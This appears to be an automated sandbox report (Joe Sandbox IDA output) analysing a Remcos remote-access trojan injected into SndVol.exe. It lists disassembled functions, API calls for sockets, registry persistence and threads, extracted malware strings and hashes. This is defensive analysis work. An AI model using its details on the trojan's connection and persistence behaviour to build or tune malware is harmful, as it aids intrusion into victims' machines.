                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                        • API String ID: 2830904901-1478563138
                                                                        • Opcode ID: f183068136f051d0d6bd476c252ab8cbdf84f4ba0ed2f8bc31004636274bf3c1
                                                                        • Instruction ID: ed743f577f5fa71053fe2a106b0e9ae71717b806e12232ed6a947f008fd0b267
                                                                        • Opcode Fuzzy Hash: f183068136f051d0d6bd476c252ab8cbdf84f4ba0ed2f8bc31004636274bf3c1
                                                                        • Instruction Fuzzy Hash: 41322B61F043407BFB9967739C94A6E26BD4FB165CFC0A82DA4025B2C1DE259F0BC399
                                                                        Function 29144F65 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 809sleepnetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 448 29144f65-29144fad call 291320df call 2914b944 call 291320df call 29131e65 call 29131fab call 2916bb2c 461 29144fbc-29145008 call 29132093 call 29131e65 call 291320f6 call 2914beac call 2913489e call 29131e65 call 2913b9f8 448->461 462 29144faf-29144fb6 Sleep 448->462 477 2914507c-29145117 call 29132093 call 29131e65 call 291320f6 call 2914beac call 29131e65 * 2 call 29136c59 call 29132f10 call 29131fe2 call 29131fd8 * 2 call 29131e65 call 29135b05 461->477 478 2914500a-29145079 call 29131e65 call 2913247c call 29131e65 call 29131fab call 29131e65 call 2913247c call 29131e65 call 29131fab call 29131e65 call 2913247c call 29131e65 call 29131fab call 2913473d 461->478 462->461 531 29145127-2914512e 477->531 532 29145119-29145125 477->532 478->477 533 29145133-291451c5 call 29135aa6 call 2913531e call 29136383 call 29132f10 call 29132093 call 2914b580 call 29131fd8 * 2 call 29131e65 call 29131fab call 29131e65 call 29131fab call 29144f24 531->533 532->533 560 291451c7-291451d2 WSAGetLastError call 2914cb72 533->560 561 29145210-2914521e call 2913482d 533->561 565 291451d7-2914520b call 291352fd call 29132093 call 2914b580 call 29131fd8 560->565 566 29145220-29145246 call 29132093 * 2 call 2914b580 561->566 567 2914524b-29145259 call 29134f51 call 291348c8 561->567 582 29145ade-29145af0 call 29134e26 call 291321fa 565->582 566->582 580 2914525e-29145260 567->580 581 29145266-291453b9 call 29131e65 * 2 call 2913531e call 29136383 call 29132f10 call 29136383 call 29132f10 call 29132093 call 2914b580 call 29131fd8 * 4 call 2914b871 call 291445f8 call 29139097 call 29171ed1 call 29131e65 call 291320f6 call 2913247c call 29131fab * 2 call 29143733 580->581 580->582 648 291453cd-291453f4 call 29131fab call 291435e1 581->648 649 291453bb-291453c8 call 29135aa6 581->649 597 29145af2-29145b12 call 29131e65 call 29131fab call 2916bb2c Sleep 582->597 598 29145b18-29145b20 call 29131e8d 582->598 597->598 598->477 655 291453f6-291453f8 648->655 656 291453fb-29145a51 call 2913417e call 2913ddc4 call 2914bcd3 call 2914bdaf call 2914bc1f call 29131e65 GetTickCount call 2914bc1f call 2914bb77 call 2914bc1f * 2 call 2914bb27 call 2914bdaf * 5 call 2913f90c call 2914bdaf call 29132f31 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 * 3 call 29132ea1 call 29132f10 call 29136383 call 29132f10 call 29136383 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 call 29136383 call 29132f10 * 5 call 29132ea1 call 29132f10 call 29132ea1 call 29132f10 * 7 call 29132ea1 call 29134aa1 call 29131fd8 * 50 call 29131f09 call 29131fd8 * 6 call 29131f09 call 29134c10 648->656 649->648 655->656 902 29145a65-29145a6c 656->902 903 29145a53-29145a5a 656->903 904 29145a6e-29145a73 call 2913b08c 902->904 905 29145a78-29145aaa call 29135a6b call 29132093 * 2 call 2914b580 902->905 903->902 906 29145a5c-29145a5e 903->906 904->905 917 29145aac-29145ab8 CreateThread 905->917 918 29145abe-29145ad9 call 29131fd8 * 2 call 29131f09 905->918 906->902 917->918 918->582
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,00000029,291A52F0,291A50E4,00000000), ref: 29144FB6
                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 291451C7
                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 29145B12
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                        • String ID: | $%I64u$5.1.2 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                        • API String ID: 524882891-2061646422
                                                                        • Opcode ID: 2c44881460b8a0a0fd25c5164f4e0c86638ec1fbb4df602cbe9afff53d1d76ca
                                                                        • Instruction ID: cd634d159c83fbfd0ded5058d17cd74fb9890e28491b89e3cd0f3159f58de299
                                                                        • Opcode Fuzzy Hash: 2c44881460b8a0a0fd25c5164f4e0c86638ec1fbb4df602cbe9afff53d1d76ca
                                                                        • Instruction Fuzzy Hash: 11525E31A001146BEB58E733DD91AFE73795F74208FE0A5A9D40A671D8EE306F4BCA58
                                                                        Function 291348C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • connect.WS2_32(?,?,?), ref: 291348E0
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 29134A00
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 29134A0E
                                                                        • WSAGetLastError.WS2_32 ref: 29134A21
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                        • API String ID: 994465650-2151626615
                                                                        • Opcode ID: f8ecd17e07a05426b880a983d0dcd9dd8646b175d60078f2bc436308fc18364c
                                                                        • Instruction ID: 079e24b81f9cf9cbf3fd05fd5c2d19c13789cf3260a65293d80e705d7dd8d60b
                                                                        • Opcode Fuzzy Hash: f8ecd17e07a05426b880a983d0dcd9dd8646b175d60078f2bc436308fc18364c
                                                                        • Instruction Fuzzy Hash: AF415C28F1024577E708777B8D8686CBE75AB6224C7C0901CD80717A95EA21DB2787E7
                                                                        Function 29134E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E38
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E43
                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E4C
                                                                        • closesocket.WS2_32(000000FF), ref: 29134E5A
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134E91
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 29134EA2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29134EA9
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EBA
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EBF
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29134EC4
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134ED1
                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,291351C0,?,?,?,29135159), ref: 29134ED6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                        • String ID:
                                                                        • API String ID: 3658366068-0
                                                                        • Opcode ID: 93416c040645de1ebd4b7d34c5c63d26123f7c5acf0a35afd31b116e1d550559
                                                                        • Instruction ID: e0da72f5a3e51287b908f0214f3cc27590229eceee2482db222df0264b2dbe81
                                                                        • Opcode Fuzzy Hash: 93416c040645de1ebd4b7d34c5c63d26123f7c5acf0a35afd31b116e1d550559
                                                                        • Instruction Fuzzy Hash: 65214F31600B04AFD7256B26DC49B56BBB1FF40339F114A2CE1E7019F0CB65B912DB54
                                                                        Function 2913DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 2913DBD5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                        • API String ID: 82841172-425784914
                                                                        • Opcode ID: f475c9989fcb740cf9f31fe5f578222f6d3eb148b0003dc079da9dd1d7b03840
                                                                        • Instruction ID: 70d53a6db3f916fd9ec1d47b199aa38a35db3f1b6b549412acd4782b8dab7444
                                                                        • Opcode Fuzzy Hash: f475c9989fcb740cf9f31fe5f578222f6d3eb148b0003dc079da9dd1d7b03840
                                                                        • Instruction Fuzzy Hash: 2A415B31518200AAE354E662DC51CAEB7BCAFB125DFC1991DB056960A4FF20AB0FC65A
                                                                        Function 2914B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                          • Part of subcall function 291435E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
                                                                          • Part of subcall function 291435E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
                                                                          • Part of subcall function 291435E1: RegCloseKey.KERNEL32(?), ref: 2914362D
                                                                        • StrToIntA.SHLWAPI(00000000,2919CA08,00000000,00000000,00000000,291A50E4,00000003,Exe,00000000,0000000E,00000000,291960CC,00000003,00000000), ref: 2914B3CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                        • API String ID: 1866151309-2070987746
                                                                        • Opcode ID: e3bdf064cc6647358bcf6812dab9ef7d02a6c4eb969266f9db75a16c1ea4d6ef
                                                                        • Instruction ID: c3fd7c668c7fd2b899fcb107082a6026ea0f30a1073719373a6a16f4512e8c00
                                                                        • Opcode Fuzzy Hash: e3bdf064cc6647358bcf6812dab9ef7d02a6c4eb969266f9db75a16c1ea4d6ef
                                                                        • Instruction Fuzzy Hash: FE113260E0008576E740A367CCD6EBE7A298BA516CFC1A129E40AA31D4FA149B0783E5
                                                                        Function 29134F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1173 29134f51-29134f5f 1174 29134f65-29134f6c 1173->1174 1175 29134fea 1173->1175 1177 29134f74-29134f7b 1174->1177 1178 29134f6e-29134f72 1174->1178 1176 29134fec-29134ff1 1175->1176 1179 29134fc0-29134fe8 CreateEventA CreateThread 1177->1179 1180 29134f7d-29134fbb GetLocalTime call 2914bc1f call 291352fd call 29132093 call 2914b580 call 29131fd8 1177->1180 1178->1179 1179->1176 1180->1179
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 29134F81
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 29134FCD
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 29134FE0
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 29134F94
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$EventLocalThreadTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 2532271599-1507639952
                                                                        • Opcode ID: 895d8a47476b3524923de90f45752cdb4cdaa0a57a94c421b3be0bef061323cb
                                                                        • Instruction ID: ec02eef02be6efa14b2f6502bbd0e5f42e74bbd2a04745082208c9c93d38a49a
                                                                        • Opcode Fuzzy Hash: 895d8a47476b3524923de90f45752cdb4cdaa0a57a94c421b3be0bef061323cb
                                                                        • Instruction Fuzzy Hash: 291136319002C47BE724A7BB8C0DEDFBFBC9BD2718F88400EE44552145C6749646CBB5
                                                                        Function 291437AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1190 291437aa-291437c1 RegCreateKeyA 1191 291437c3-291437f8 call 2913247c call 29131fab RegSetValueExA RegCloseKey 1190->1191 1192 291437fa 1190->1192 1194 291437fc-2914380a call 29131fd8 1191->1194 1192->1194
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 291437B9
                                                                        • RegSetValueExA.KERNEL32(?,291974C8,00000000,?,00000000,00000000,291A52F0,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437E1
                                                                        • RegCloseKey.KERNEL32(?,?,?,2913F88E,291974C8,5.1.2 Pro), ref: 291437EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 63123c1d247e9fd937e9b9299835f73bb7f8d7202c3c820374c40632a2fd3e98
                                                                        • Instruction ID: 4d70fef8a28803fd41301a5c872aecd1f2cdc171ef2506b7a692098d9f353deb
                                                                        • Opcode Fuzzy Hash: 63123c1d247e9fd937e9b9299835f73bb7f8d7202c3c820374c40632a2fd3e98
                                                                        • Instruction Fuzzy Hash: 1AF06D72900118BBEB01AFA2ED55EEA3B7CFF08655F108155FD05A6010EB359F15AB90
                                                                        Function 291435E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1277 291435e1-2914360d RegOpenKeyExA 1278 29143642 1277->1278 1279 2914360f-29143637 RegQueryValueExA RegCloseKey 1277->1279 1280 29143644 1278->1280 1279->1280 1281 29143639-29143640 1279->1281 1282 29143649-29143655 call 29132093 1280->1282 1281->1282
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
                                                                        • RegCloseKey.KERNEL32(?), ref: 2914362D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 6422cc7a9b0da0b56e3703ad30e2a24803b3d64b445c6f088fa2004ac21d44c3
                                                                        • Instruction ID: ebe6df005cde654a9903f9230be90a3a15e791f20133653b331fdc4b1587b97c
                                                                        • Opcode Fuzzy Hash: 6422cc7a9b0da0b56e3703ad30e2a24803b3d64b445c6f088fa2004ac21d44c3
                                                                        • Instruction Fuzzy Hash: BD01D676E0012CBBDB109B92ED48DDE7F7DEB48754F004066BE05A6204DA308F069BB4
                                                                        Function 29143584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1285 29143584-291435ac RegOpenKeyExA 1286 291435ae-291435d9 RegQueryValueExA RegCloseKey 1285->1286 1287 291435db 1285->1287 1288 291435dd-291435e0 1286->1288 1287->1288
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 291435A4
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,291A52F0), ref: 291435C2
                                                                        • RegCloseKey.KERNEL32(?), ref: 291435CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: eae27d50b206fd8eb75dde5f61e4fa202824f887e44c00cd6b71a239fe2a5412
                                                                        • Instruction ID: 885425df837dd00aeadbbc5c67b72bd89c0f4e67f429b56b85512fa77998a037
                                                                        • Opcode Fuzzy Hash: eae27d50b206fd8eb75dde5f61e4fa202824f887e44c00cd6b71a239fe2a5412
                                                                        • Instruction Fuzzy Hash: EDF01D76E0021CBFEF109EA1ED49FED7BBCEB08714F108095BA04EA141E6355B15AB90
                                                                        Function 2914353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1289 2914353a-29143559 RegOpenKeyExA 1290 2914357d 1289->1290 1291 2914355b-2914357b RegQueryValueExA RegCloseKey 1289->1291 1292 2914357f-29143583 1290->1292 1291->1292
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,2913C1D7,29196C58), ref: 29143551
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,2913C1D7,29196C58), ref: 29143565
                                                                        • RegCloseKey.KERNEL32(?,?,?,2913C1D7,29196C58), ref: 29143570
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 95e417f46469a47d222b080fcc63a8f8f786a9b650677c92def8c3a3feaeb3c4
                                                                        • Instruction ID: 069e27620f72aa3803624d7352cf5a87054bc4b466a54e78f76339e35ca24a59
                                                                        • Opcode Fuzzy Hash: 95e417f46469a47d222b080fcc63a8f8f786a9b650677c92def8c3a3feaeb3c4
                                                                        • Instruction Fuzzy Hash: D7E06D32D12238BBEB215AA3ED0DDEB7FACEF0A7A4B010145BD08A6101D2254F10E6E0
                                                                        Function 291438B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1293 291438b2-291438c8 RegCreateKeyA 1294 291438f4 1293->1294 1295 291438ca-291438f2 RegSetValueExA RegCloseKey 1293->1295 1296 291438f6-291438f9 1294->1296 1295->1296
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,291960B4), ref: 291438C0
                                                                        • RegSetValueExA.KERNEL32(291960B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438DB
                                                                        • RegCloseKey.ADVAPI32(291960B4,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID:
                                                                        • API String ID: 1818849710-0
                                                                        • Opcode ID: e929e7c6c6375fc3d2cb705e5d5f2334f00bb79146cae1f58e0a165cf39bd519
                                                                        • Instruction ID: b6979761f6181650b8169cb865c79ebb2cf4a595d60a306dd0d7a7230282e6ca
                                                                        • Opcode Fuzzy Hash: e929e7c6c6375fc3d2cb705e5d5f2334f00bb79146cae1f58e0a165cf39bd519
                                                                        • Instruction Fuzzy Hash: 15E03072A00218BBEB109E92DD0AFDA7B6CEF08754F104155BF0496140D6354A14A791
                                                                        Function 2914CB72 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,291A4EF8,291A4EF8), ref: 2914CB9A
                                                                        • LocalFree.KERNEL32(?,?), ref: 2914CBC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FormatFreeLocalMessage
                                                                        • String ID:
                                                                        • API String ID: 1427518018-0
                                                                        • Opcode ID: 367806a9a8c431e8e517ed96e91310395a03059299f1c9eeb21ebbe2a2367c4e
                                                                        • Instruction ID: 292ef087a494752b61a54904f0cc1a8012eabff86b62eb0475b70bc41b70fffb
                                                                        • Opcode Fuzzy Hash: 367806a9a8c431e8e517ed96e91310395a03059299f1c9eeb21ebbe2a2367c4e
                                                                        • Instruction Fuzzy Hash: 77F0C830F0014DBBDF18ABA7DC49CFE773CDB94358B50806AB516A2194EE605F0BD665
                                                                        Function 2913482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WS2_32(?,00000001,00000006), ref: 29134852
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,2913530B,?,?,00000000,00000000,?,?,00000000,29135208,?,00000000), ref: 2913488E
                                                                          • Part of subcall function 2913489E: WSAStartup.WS2_32(00000202,00000000), ref: 291348B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEventStartupsocket
                                                                        • String ID:
                                                                        • API String ID: 1953588214-0
                                                                        • Opcode ID: ec5aa054b2fad68ee3e0641764703ad6df0681f266dad8a15b5a81e6ef1d66fb
                                                                        • Instruction ID: fbe0a2e5ae52ab5737bf989886fc0b390c4f226991071b6ceb138713ec3a6a67
                                                                        • Opcode Fuzzy Hash: ec5aa054b2fad68ee3e0641764703ad6df0681f266dad8a15b5a81e6ef1d66fb
                                                                        • Instruction Fuzzy Hash: C4019A71808BC09EE7399F2AA44A6867FE1AB05304F044E9EF0CA93B91C3B4A442CB14
                                                                        Function 29144F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,291A2ADC,291A50E4,00000000,291451C3,00000000,00000001), ref: 29144F46
                                                                        • WSASetLastError.WS2_32(00000000), ref: 29144F4B
                                                                          • Part of subcall function 29144DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 29144E10
                                                                          • Part of subcall function 29144DC1: LoadLibraryA.KERNEL32(?), ref: 29144E52
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144E72
                                                                          • Part of subcall function 29144DC1: FreeLibrary.KERNEL32(00000000), ref: 29144E79
                                                                          • Part of subcall function 29144DC1: LoadLibraryA.KERNEL32(?), ref: 29144EB1
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144EC3
                                                                          • Part of subcall function 29144DC1: FreeLibrary.KERNEL32(00000000), ref: 29144ECA
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,?), ref: 29144ED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 1170566393-0
                                                                        • Opcode ID: f990d79d69a96f992defa329c7cf2869c4930b343cc9588a5a5c0f883e890fc9
                                                                        • Instruction ID: 9cf5ec890758cfd6c8ffc7890f810523de85c053fe21cfa3a7330c7d06bccc02
                                                                        • Opcode Fuzzy Hash: f990d79d69a96f992defa329c7cf2869c4930b343cc9588a5a5c0f883e890fc9
                                                                        • Instruction Fuzzy Hash: 55D05B327004216FE354765F9C45FAF99DDDF99764B110027F914D3645D6548D4287A0
                                                                        Function 2913D0A4 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,2913EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,291960CC,00000003,00000000), ref: 2913D0B3
                                                                        • GetLastError.KERNEL32 ref: 2913D0BE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID:
                                                                        • API String ID: 1925916568-0
                                                                        • Opcode ID: c4bd332a38b444af79dc3e294d1653aefd63e543a2bcf596cc937c4ac960c757
                                                                        • Instruction ID: 6cb8ca36e6dc94c2219bdc6d0de03861b52adf0fef207b7f43f0ccf2322f2e09
                                                                        • Opcode Fuzzy Hash: c4bd332a38b444af79dc3e294d1653aefd63e543a2bcf596cc937c4ac960c757
                                                                        • Instruction Fuzzy Hash: 26D02270708200ABFB0C3732DC4C75C3C6AAB50301F400418B007C44C0CA784880DA00
